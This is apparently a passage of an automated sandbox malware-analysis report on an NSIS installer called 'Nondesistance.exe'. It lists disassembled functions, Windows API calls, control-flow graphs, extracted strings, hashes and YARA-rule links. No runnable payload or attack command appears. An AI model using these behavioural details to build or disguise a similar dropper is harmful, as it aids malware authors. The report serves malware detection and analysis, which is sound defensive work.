                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 10001E76
                                                                                                  • lstrcpyA.KERNEL32(?,?), ref: 10001FCA
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20224243573.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.20224205010.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20224274318.0000000010003000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20224300969.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_10000000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Global$Free$lstrcpy$Alloc
                                                                                                  • String ID:
                                                                                                  • API String ID: 4227406936-0
                                                                                                  • Opcode ID: 108015169a1f9511be137f3b76d088d284be53ebd3be1ec406ce9b744c5ee79e
                                                                                                  • Instruction ID: 780798ea066e4ece118e8e5fed0bf18c828ec290136deaf2e43fc5d0554b8685
                                                                                                  • Opcode Fuzzy Hash: 108015169a1f9511be137f3b76d088d284be53ebd3be1ec406ce9b744c5ee79e
                                                                                                  • Instruction Fuzzy Hash: 17129971D0424ADFFB20CFA4C8847EEBBF4FB043C4F61852AD5A1A2199DB749A81CB51
                                                                                                  Function 004055D1 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 159filestringCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 685 4055d1-4055f7 call 40588f 688 405610-405617 685->688 689 4055f9-40560b DeleteFileA 685->689 691 405619-40561b 688->691 692 40562a-40563a call 405d2f 688->692 690 40579a-40579e 689->690 693 405621-405624 691->693 694 405748-40574d 691->694 700 405649-40564a call 4057e8 692->700 701 40563c-405647 lstrcatA 692->701 693->692 693->694 694->690 697 40574f-405752 694->697 698 405754-40575a 697->698 699 40575c-405764 call 406033 697->699 698->690 699->690 708 405766-40577a call 4057a1 call 405589 699->708 703 40564f-405652 700->703 701->703 706 405654-40565b 703->706 707 40565d-405663 lstrcatA 703->707 706->707 709 405668-405686 lstrlenA FindFirstFileA 706->709 707->709 724 405792-405795 call 404f48 708->724 725 40577c-40577f 708->725 711 40568c-4056a3 call 4057cc 709->711 712 40573e-405742 709->712 718 4056a5-4056a9 711->718 719 4056ae-4056b1 711->719 712->694 714 405744 712->714 714->694 718->719 721 4056ab 718->721 722 4056b3-4056b8 719->722 723 4056c4-4056d2 call 405d2f 719->723 721->719 727 4056ba-4056bc 722->727 728 40571d-40572f FindNextFileA 722->728 735 4056d4-4056dc 723->735 736 4056e9-4056f4 call 405589 723->736 724->690 725->698 730 405781-405790 call 404f48 call 405bea 725->730 727->723 731 4056be-4056c2 727->731 728->711 733 405735-405738 FindClose 728->733 730->690 731->723 731->728 733->712 735->728 738 4056de-4056e7 call 4055d1 735->738 744 405715-405718 call 404f48 736->744 745 4056f6-4056f9 736->745 738->728 744->728 747 4056fb-40570b call 404f48 call 405bea 745->747 748 40570d-405713 745->748 747->728 748->728
                                                                                                  APIs
                                                                                                  • DeleteFileA.KERNELBASE(?,?,77323410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004055FA
                                                                                                  • lstrcatA.KERNEL32(0042A870,\*.*,0042A870,?,?,77323410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405642
                                                                                                  • lstrcatA.KERNEL32(?,00409014,?,0042A870,?,?,77323410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405663
                                                                                                  • lstrlenA.KERNEL32(?,?,00409014,?,0042A870,?,?,77323410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405669
                                                                                                  • FindFirstFileA.KERNEL32(0042A870,?,?,?,00409014,?,0042A870,?,?,77323410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040567A
                                                                                                  • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405727
                                                                                                  • FindClose.KERNEL32(00000000), ref: 00405738
                                                                                                  Strings
                                                                                                  • "C:\Users\user\Desktop\Nondesistance.exe", xrefs: 004055D1
                                                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 004055DE
                                                                                                  • \*.*, xrefs: 0040563C
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.20220594441.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220656927.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220953664.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                  • String ID: "C:\Users\user\Desktop\Nondesistance.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                  • API String ID: 2035342205-3436785771
                                                                                                  • Opcode ID: 2b7e5661b8b3b760765e09419aafe74f52747e63502cbb40739d7b63bde2251d
                                                                                                  • Instruction ID: d14c28ea715dd5a13497ef66355ac6b33f8f035006b682f92d24d725560d25e8
                                                                                                  • Opcode Fuzzy Hash: 2b7e5661b8b3b760765e09419aafe74f52747e63502cbb40739d7b63bde2251d
                                                                                                  • Instruction Fuzzy Hash: 0D51CF30800A44AADF21AB258C85BBF7AB8DF92754F54447BF404761D2D73C8982EE6E
                                                                                                  Function 0040205E Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139comCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • CoCreateInstance.OLE32(00407514,?,?,00407504,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020DD
                                                                                                  • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,?,00407504,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402189
                                                                                                  Strings
                                                                                                  • C:\Users\user\dewater\reinsmen, xrefs: 0040211D
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.20220594441.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220656927.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220953664.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ByteCharCreateInstanceMultiWide
                                                                                                  • String ID: C:\Users\user\dewater\reinsmen
                                                                                                  • API String ID: 123533781-140973065
                                                                                                  • Opcode ID: 1f408d59b01629bfe246ddbdf59bfe45880d3d1aed491cd0b433af8612de1ea5
                                                                                                  • Instruction ID: 202bff00353f62e800299527826cf24c9a9ce8e01df6a73eade79aa1dd8fb932
                                                                                                  • Opcode Fuzzy Hash: 1f408d59b01629bfe246ddbdf59bfe45880d3d1aed491cd0b433af8612de1ea5
                                                                                                  • Instruction Fuzzy Hash: 16512775A00208BFCF10DFA4CD88A9DBBB5BF48318F20856AF615EB2D1DA799941CB14
                                                                                                  Function 00406033 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • FindFirstFileA.KERNELBASE(77323410,0042B0B8,0042AC70,004058D2,0042AC70,0042AC70,00000000,0042AC70,0042AC70,77323410,?,C:\Users\user\AppData\Local\Temp\,004055F1,?,77323410,C:\Users\user\AppData\Local\Temp\), ref: 0040603E
                                                                                                  • FindClose.KERNEL32(00000000), ref: 0040604A
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.20220594441.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220656927.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220953664.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Find$CloseFileFirst
                                                                                                  • String ID:
                                                                                                  • API String ID: 2295610775-0
                                                                                                  • Opcode ID: 1a0439c71b90d7762d613f3ef5096b6a49eabdc5bf1978f8ceae5763bb33e6b2
                                                                                                  • Instruction ID: 8bfbb141000912a81af5c8de5ce039a851029b32224eb031c3a4159cf0b452c4
                                                                                                  • Opcode Fuzzy Hash: 1a0439c71b90d7762d613f3ef5096b6a49eabdc5bf1978f8ceae5763bb33e6b2
                                                                                                  • Instruction Fuzzy Hash: 11D0123195D1205BC31167387D0C88B7B599B163317518A33B56AF12F0C7349C6686EE
                                                                                                  Function 00402688 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • FindFirstFileA.KERNELBASE(00000000,?,00000002), ref: 00402697
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.20220594441.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220656927.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220953664.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FileFindFirst
                                                                                                  • String ID:
                                                                                                  • API String ID: 1974802433-0
                                                                                                  • Opcode ID: c726fce334b162bffbc1a7bc3135fcd734087509c80d7b9bc143c566e0aa852e
                                                                                                  • Instruction ID: 3dffafe4ea1a5cbb8d5ba181f96d08faa62a405c2aca3b81b81ef469795ec413
                                                                                                  • Opcode Fuzzy Hash: c726fce334b162bffbc1a7bc3135fcd734087509c80d7b9bc143c566e0aa852e
                                                                                                  • Instruction Fuzzy Hash: 7AF0A0326081049FE701EBA49949AEEB7789F21324F60057BE241A21C1D7B84985AB3A
                                                                                                  Function 004036AF Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215stringregistryCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 282 4036af-4036c7 call 4060c8 285 4036c9-4036d9 call 405c8d 282->285 286 4036db-40370c call 405c16 282->286 294 40372f-403758 call 403974 call 40588f 285->294 290 403724-40372a lstrcatA 286->290 291 40370e-40371f call 405c16 286->291 290->294 291->290 300 40375e-403763 294->300 301 4037df-4037e7 call 40588f 294->301 300->301 302 403765-403789 call 405c16 300->302 307 4037f5-40381a LoadImageA 301->307 308 4037e9-4037f0 call 405d51 301->308 302->301 311 40378b-40378d 302->311 309 40389b-4038a3 call 40140b 307->309 310 40381c-40384c RegisterClassA 307->310 308->307 324 4038a5-4038a8 309->324 325 4038ad-4038b8 call 403974 309->325 313 403852-403896 SystemParametersInfoA CreateWindowExA 310->313 314 40396a 310->314 316 40379e-4037aa lstrlenA 311->316 317 40378f-40379c call 4057cc 311->317 313->309 322 40396c-403973 314->322 318 4037d2-4037da call 4057a1 call 405d2f 316->318 319 4037ac-4037ba lstrcmpiA 316->319 317->316 318->301 319->318 323 4037bc-4037c6 GetFileAttributesA 319->323 328 4037c8-4037ca 323->328 329 4037cc-4037cd call 4057e8 323->329 324->322 335 403941-403942 call 40501a 325->335 336 4038be-4038d8 ShowWindow call 40605a 325->336 328->318 328->329 329->318 339 403947-403949 335->339 343 4038e4-4038f6 GetClassInfoA 336->343 344 4038da-4038df call 40605a 336->344 341 403963-403965 call 40140b 339->341 342 40394b-403951 339->342 341->314 342->324 345 403957-40395e call 40140b 342->345 348 4038f8-403908 GetClassInfoA RegisterClassA 343->348 349 40390e-403931 DialogBoxParamA call 40140b 343->349 344->343 345->324 348->349 352 403936-40393f call 4035ff 349->352 352->322
                                                                                                  APIs
                                                                                                    • Part of subcall function 004060C8: GetModuleHandleA.KERNEL32(?,?,?,00403179,00000009), ref: 004060DA
                                                                                                    • Part of subcall function 004060C8: GetProcAddress.KERNEL32(00000000,?), ref: 004060F5
                                                                                                  • lstrcatA.KERNEL32(1033,Skuldertasken115 Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Skuldertasken115 Setup: Installing,00000000,00000002,77323410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Nondesistance.exe",00000000), ref: 0040372A
                                                                                                  • lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\dewater\reinsmen,1033,Skuldertasken115 Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Skuldertasken115 Setup: Installing,00000000,00000002,77323410), ref: 0040379F
                                                                                                  • lstrcmpiA.KERNEL32(?,.exe), ref: 004037B2
                                                                                                  • GetFileAttributesA.KERNEL32(Call), ref: 004037BD
                                                                                                  • LoadImageA.USER32(00000067,?,00000000,00000000,00008040,C:\Users\user\dewater\reinsmen), ref: 00403806
                                                                                                    • Part of subcall function 00405C8D: wsprintfA.USER32 ref: 00405C9A
                                                                                                  • RegisterClassA.USER32(0042DBA0), ref: 00403843
                                                                                                  • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0040385B
                                                                                                  • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403890
                                                                                                  • ShowWindow.USER32(00000005,00000000), ref: 004038C6
                                                                                                  • GetClassInfoA.USER32(00000000,RichEdit20A,0042DBA0), ref: 004038F2
                                                                                                  • GetClassInfoA.USER32(00000000,RichEdit,0042DBA0), ref: 004038FF
                                                                                                  • RegisterClassA.USER32(0042DBA0), ref: 00403908
                                                                                                  • DialogBoxParamA.USER32(?,00000000,00403A41,00000000), ref: 00403927
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.20220594441.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220656927.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220953664.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                  • String ID: "C:\Users\user\Desktop\Nondesistance.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\dewater\reinsmen$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$Skuldertasken115 Setup: Installing$_Nb
                                                                                                  • API String ID: 1975747703-2333544106
                                                                                                  • Opcode ID: 0292f59ab6d59e57951c6bdb15198e3a3899d8923361e63ce45ef1692923f403
                                                                                                  • Instruction ID: 60e5f6254d87716c4f77e59e0de616dae33e132719ef70849b8472436850552a
                                                                                                  • Opcode Fuzzy Hash: 0292f59ab6d59e57951c6bdb15198e3a3899d8923361e63ce45ef1692923f403
                                                                                                  • Instruction Fuzzy Hash: 4161E6B07442006EE620BF269C85F373EACEB45749F50443FF945B62E2C67CAD429A2D
                                                                                                  Function 00402C66 Relevance: 26.4, APIs: 5, Strings: 10, Instructions: 182COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 356 402c66-402cb4 GetTickCount GetModuleFileNameA call 4059a2 359 402cc0-402cee call 405d2f call 4057e8 call 405d2f GetFileSize 356->359 360 402cb6-402cbb 356->360 368 402cf4 359->368 369 402ddb-402de9 call 402c02 359->369 361 402e98-402e9c 360->361 371 402cf9-402d10 368->371 376 402deb-402dee 369->376 377 402e3e-402e43 369->377 373 402d12 371->373 374 402d14-402d1d call 4030b1 371->374 373->374 381 402d23-402d2a 374->381 382 402e45-402e4d call 402c02 374->382 379 402df0-402e08 call 4030c7 call 4030b1 376->379 380 402e12-402e3c GlobalAlloc call 4030c7 call 402e9f 376->380 377->361 379->377 403 402e0a-402e10 379->403 380->377 407 402e4f-402e60 380->407 385 402da6-402daa 381->385 386 402d2c-402d40 call 40595d 381->386 382->377 390 402db4-402dba 385->390 391 402dac-402db3 call 402c02 385->391 386->390 405 402d42-402d49 386->405 398 402dc9-402dd3 390->398 399 402dbc-402dc6 call 40613d 390->399 391->390 398->371 406 402dd9 398->406 399->398 403->377 403->380 405->390 409 402d4b-402d52 405->409 406->369 410 402e62 407->410 411 402e68-402e6d 407->411 409->390 412 402d54-402d5b 409->412 410->411 413 402e6e-402e74 411->413 412->390 415 402d5d-402d64 412->415 413->413 414 402e76-402e91 SetFilePointer call 40595d 413->414 418 402e96 414->418 415->390 417 402d66-402d86 415->417 417->377 419 402d8c-402d90 417->419 418->361 420 402d92-402d96 419->420 421 402d98-402da0 419->421 420->406 420->421 421->390 422 402da2-402da4 421->422 422->390
                                                                                                  APIs
                                                                                                  • GetTickCount.KERNEL32 ref: 00402C77
                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\Nondesistance.exe,00000400), ref: 00402C93
                                                                                                    • Part of subcall function 004059A2: GetFileAttributesA.KERNELBASE(00000003,00402CA6,C:\Users\user\Desktop\Nondesistance.exe,80000000,00000003), ref: 004059A6
                                                                                                    • Part of subcall function 004059A2: CreateFileA.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 004059C8
                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,00436000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Nondesistance.exe,C:\Users\user\Desktop\Nondesistance.exe,80000000,00000003), ref: 00402CDF
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.20220594441.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220656927.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220953664.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Nondesistance.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                  • String ID: "C:\Users\user\Desktop\Nondesistance.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Nondesistance.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft$uR
                                                                                                  • API String ID: 4283519449-3347255130
                                                                                                  • Opcode ID: 4eb7fdbfa3b6d290a18a6bc5ec9469a4ae157c267e60227b4c2036f25b06a2cd
                                                                                                  • Instruction ID: 2dd8a40a4a6da4a25a7ff80ffc2ca296f3ca1cc65932c4217ff60142993c7b59
                                                                                                  • Opcode Fuzzy Hash: 4eb7fdbfa3b6d290a18a6bc5ec9469a4ae157c267e60227b4c2036f25b06a2cd
                                                                                                  • Instruction Fuzzy Hash: 9651F771940214ABDF20AF65DE89B9E7AA8EF04714F54803BF504B72D2C7BC9D418BAD
                                                                                                  Function 00401751 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147stringtimeCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 754 401751-401774 call 402a3a call 40580e 759 401776-40177c call 405d2f 754->759 760 40177e-401790 call 405d2f call 4057a1 lstrcatA 754->760 766 401795-40179b call 405f9a 759->766 760->766 770 4017a0-4017a4 766->770 771 4017a6-4017b0 call 406033 770->771 772 4017d7-4017da 770->772 780 4017c2-4017d4 771->780 781 4017b2-4017c0 CompareFileTime 771->781 774 4017e2-4017fe call 4059a2 772->774 775 4017dc-4017dd call 40597d 772->775 782 401800-401803 774->782 783 401876-40189f call 404f48 call 402e9f 774->783 775->774 780->772 781->780 784 401805-401847 call 405d2f * 2 call 405d51 call 405d2f call 405525 782->784 785 401858-401862 call 404f48 782->785 797 4018a1-4018a5 783->797 798 4018a7-4018b3 SetFileTime 783->798 784->770 819 40184d-40184e 784->819 795 40186b-401871 785->795 799 4028d8 795->799 797->798 801 4018b9-4018c4 CloseHandle 797->801 798->801 803 4028da-4028de 799->803 804 4018ca-4018cd 801->804 805 4028cf-4028d2 801->805 807 4018e2-4018e5 call 405d51 804->807 808 4018cf-4018e0 call 405d51 lstrcatA 804->808 805->799 813 4018ea-402269 807->813 808->813 817 40226e-402273 813->817 818 402269 call 405525 813->818 817->803 818->817 819->795 820 401850-401851 819->820 820->785
                                                                                                  APIs
                                                                                                  • lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\dewater\reinsmen,00000000,00000000,00000031), ref: 00401790
                                                                                                  • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\dewater\reinsmen,00000000,00000000,00000031), ref: 004017BA
                                                                                                    • Part of subcall function 00405D2F: lstrcpynA.KERNEL32(?,?,00000400,004031BD,Skuldertasken115 Setup,NSIS Error), ref: 00405D3C
                                                                                                    • Part of subcall function 00404F48: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsn16C1.tmp\System.dll,00000000,0041B020,773223A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000,?), ref: 00404F81
                                                                                                    • Part of subcall function 00404F48: lstrlenA.KERNEL32(00402FFA,Skipped: C:\Users\user\AppData\Local\Temp\nsn16C1.tmp\System.dll,00000000,0041B020,773223A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000), ref: 00404F91
                                                                                                    • Part of subcall function 00404F48: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsn16C1.tmp\System.dll,00402FFA,00402FFA,Skipped: C:\Users\user\AppData\Local\Temp\nsn16C1.tmp\System.dll,00000000,0041B020,773223A0), ref: 00404FA4
                                                                                                    • Part of subcall function 00404F48: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsn16C1.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsn16C1.tmp\System.dll), ref: 00404FB6
                                                                                                    • Part of subcall function 00404F48: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FDC
                                                                                                    • Part of subcall function 00404F48: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FF6
                                                                                                    • Part of subcall function 00404F48: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405004
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.20220625532.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.20220594441.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220656927.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.20220687253.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
